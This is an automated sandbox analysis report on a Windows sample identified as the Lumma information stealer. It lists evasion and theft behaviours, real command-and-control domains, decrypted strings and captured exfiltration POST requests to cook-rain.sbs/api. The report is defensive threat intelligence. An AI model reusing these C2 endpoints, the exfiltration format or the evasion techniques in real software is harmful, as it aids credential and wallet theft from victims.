Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1560145
MD5:02fc2c82de8b775d97a32a39e1d34960
SHA1:74496749c3f724136f259865d542221a22eac880
SHA256:3231ef2658fb47a9a80f3ea5238ff1ed3afd67384a55335e9bce3660adf6b4f6
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7748 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 02FC2C82DE8B775D97A32A39E1D34960)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["processhol.sbs", "3xp3cts1aim.sbs", "p10tgrace.sbs", "peepburry828.sbs", "p3ar11fter.sbs"], "Build id": "LOGS11--LiveTraffic"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: file.exe PID: 7748JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      Process Memory Space: file.exe PID: 7748JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: file.exe PID: 7748JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
          decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-21T13:10:14.843348+010020283713Unknown Traffic192.168.2.1049706188.114.97.3443TCP
            2024-11-21T13:10:16.921833+010020283713Unknown Traffic192.168.2.1049712188.114.97.3443TCP
            2024-11-21T13:10:19.305479+010020283713Unknown Traffic192.168.2.1049718188.114.97.3443TCP
            2024-11-21T13:10:21.683352+010020283713Unknown Traffic192.168.2.1049724188.114.97.3443TCP
            2024-11-21T13:10:24.050016+010020283713Unknown Traffic192.168.2.1049730188.114.97.3443TCP
            2024-11-21T13:10:26.474644+010020283713Unknown Traffic192.168.2.1049736188.114.97.3443TCP
            2024-11-21T13:10:28.989608+010020283713Unknown Traffic192.168.2.1049744188.114.97.3443TCP
            2024-11-21T13:10:33.166293+010020283713Unknown Traffic192.168.2.1049762188.114.97.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-21T13:10:15.563581+010020546531A Network Trojan was detected192.168.2.1049706188.114.97.3443TCP
            2024-11-21T13:10:17.633811+010020546531A Network Trojan was detected192.168.2.1049712188.114.97.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-21T13:10:15.563581+010020498361A Network Trojan was detected192.168.2.1049706188.114.97.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-21T13:10:17.633811+010020498121A Network Trojan was detected192.168.2.1049712188.114.97.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-21T13:10:14.843348+010020577311Domain Observed Used for C2 Detected192.168.2.1049706188.114.97.3443TCP
            2024-11-21T13:10:16.921833+010020577311Domain Observed Used for C2 Detected192.168.2.1049712188.114.97.3443TCP
            2024-11-21T13:10:19.305479+010020577311Domain Observed Used for C2 Detected192.168.2.1049718188.114.97.3443TCP
            2024-11-21T13:10:21.683352+010020577311Domain Observed Used for C2 Detected192.168.2.1049724188.114.97.3443TCP
            2024-11-21T13:10:24.050016+010020577311Domain Observed Used for C2 Detected192.168.2.1049730188.114.97.3443TCP
            2024-11-21T13:10:26.474644+010020577311Domain Observed Used for C2 Detected192.168.2.1049736188.114.97.3443TCP
            2024-11-21T13:10:28.989608+010020577311Domain Observed Used for C2 Detected192.168.2.1049744188.114.97.3443TCP
            2024-11-21T13:10:33.166293+010020577311Domain Observed Used for C2 Detected192.168.2.1049762188.114.97.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-21T13:10:13.209048+010020577301Domain Observed Used for C2 Detected192.168.2.10577971.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-21T13:10:20.231641+010020480941Malware Command and Control Activity Detected192.168.2.1049718188.114.97.3443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: file.exeAvira: detected
            Antivirus detection for URL or domain
            Source: https://cook-rain.sbs/apiMlAvira URL Cloud: Label: malware
            Source: https://cook-rain.sbs/api:nAvira URL Cloud: Label: malware
            Source: https://cook-rain.sbs/api)Avira URL Cloud: Label: malware
            Source: https://cook-rain.sbs/PAvira URL Cloud: Label: malware
            Found malware configuration
            Source: file.exe.7748.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["processhol.sbs", "3xp3cts1aim.sbs", "p10tgrace.sbs", "peepburry828.sbs", "p3ar11fter.sbs"], "Build id": "LOGS11--LiveTraffic"}
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: file.exeJoe Sandbox ML: detected
            Sample uses string decryption to hide its real strings
            Source: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmpString decryptor: p3ar11fter.sbs
            Source: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmpString decryptor: 3xp3cts1aim.sbs
            Source: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmpString decryptor: peepburry828.sbs
            Source: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmpString decryptor: p10tgrace.sbs
            Source: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmpString decryptor: processhol.sbs
            Source: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
            Source: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
            Source: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
            Source: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49718 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49724 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49744 version: TLS 1.2
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx]0_2_00354800
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_00371160
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edx+4B5D9729h]0_2_0033CA6A
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-05h]0_2_0033BDB0
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov esi, edx0_2_00357E50
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-69h]0_2_00357E50
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [eax], bl0_2_0033CEF5
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-532F9054h]0_2_0033A874
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h]0_2_00333060
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebp, dword ptr [ecx+esi*4-000009BCh]0_2_00339150
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+000011E4h]0_2_00355150
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_00348940
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, word ptr [edi+ecx*4]0_2_00337BB0
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+34h]0_2_00337BB0
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_00337BB0
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 1B6183F2h0_2_0036BF10
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]0_2_00331F50
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [esp+esi+04h]0_2_0036BFC0

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2057730 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cook-rain .sbs) : 192.168.2.10:57797 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.10:49706 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.10:49718 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.10:49724 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.10:49736 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.10:49712 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.10:49744 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.10:49730 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.10:49762 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:49706 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49706 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.10:49712 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49712 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.10:49718 -> 188.114.97.3:443
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: processhol.sbs
            Source: Malware configuration extractorURLs: 3xp3cts1aim.sbs
            Source: Malware configuration extractorURLs: p10tgrace.sbs
            Source: Malware configuration extractorURLs: peepburry828.sbs
            Source: Malware configuration extractorURLs: p3ar11fter.sbs
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49706 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49718 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49724 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49736 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49712 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49744 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49730 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49762 -> 188.114.97.3:443
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cook-rain.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: cook-rain.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=AVORIOJXV765HT2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12835Host: cook-rain.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=92XN0U0NYXL5IDP46User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15074Host: cook-rain.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KOV1MUE2Z06Q37QAMKSUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20448Host: cook-rain.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YK33R37UURUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1197Host: cook-rain.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YSONZWT4DXTKHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 585323Host: cook-rain.sbs
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: cook-rain.sbs
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cook-rain.sbs
            Source: file.exe, 00000000.00000003.1420825256.00000000056E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: file.exe, 00000000.00000003.1420825256.00000000056E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: file.exe, 00000000.00000003.1420825256.00000000056E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: file.exe, 00000000.00000003.1420825256.00000000056E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: file.exe, 00000000.00000003.1420825256.00000000056E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: file.exe, 00000000.00000003.1420825256.00000000056E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: file.exe, 00000000.00000003.1420825256.00000000056E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: file.exe, 00000000.00000003.1420825256.00000000056E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: file.exe, 00000000.00000003.1420825256.00000000056E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: file.exe, 00000000.00000003.1520903809.0000000000F46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
            Source: file.exe, 00000000.00000003.1420825256.00000000056E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: file.exe, 00000000.00000003.1420825256.00000000056E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: file.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: file.exe, 00000000.00000003.1443482290.0000000000F7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700
            Source: file.exe, 00000000.00000003.1443519497.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1466794753.0000000000F7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&cta
            Source: file.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: file.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: file.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: file.exe, 00000000.00000003.1443519497.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1466794753.0000000000F7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com
            Source: file.exe, 00000000.00000003.1443482290.0000000000F7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg
            Source: file.exe, 00000000.00000002.1546637487.0000000000F01000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1484354122.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1520806713.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1546918977.0000000000F70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/
            Source: file.exe, 00000000.00000002.1546637487.0000000000F01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/P
            Source: file.exe, 00000000.00000002.1546637487.0000000000F01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/api
            Source: file.exe, 00000000.00000003.1420595420.0000000000F74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/api)
            Source: file.exe, 00000000.00000002.1546857241.0000000000F51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/api:n
            Source: file.exe, 00000000.00000003.1520903809.0000000000F51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/apiMl
            Source: file.exe, 00000000.00000002.1546637487.0000000000F01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/apiY
            Source: file.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: file.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: file.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: file.exe, 00000000.00000003.1443482290.0000000000F7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYi
            Source: file.exe, 00000000.00000003.1421874521.00000000059E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: file.exe, 00000000.00000003.1421874521.00000000059E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: file.exe, 00000000.00000003.1443519497.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1466794753.0000000000F7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64
            Source: file.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: file.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: file.exe, 00000000.00000003.1443482290.0000000000F7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Pr
            Source: file.exe, 00000000.00000003.1421874521.00000000059E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.d-GHL1OW1fkT
            Source: file.exe, 00000000.00000003.1421874521.00000000059E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.sYEKgG4Or0s6
            Source: file.exe, 00000000.00000003.1421874521.00000000059E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: file.exe, 00000000.00000003.1421874521.00000000059E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: file.exe, 00000000.00000003.1421874521.00000000059E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
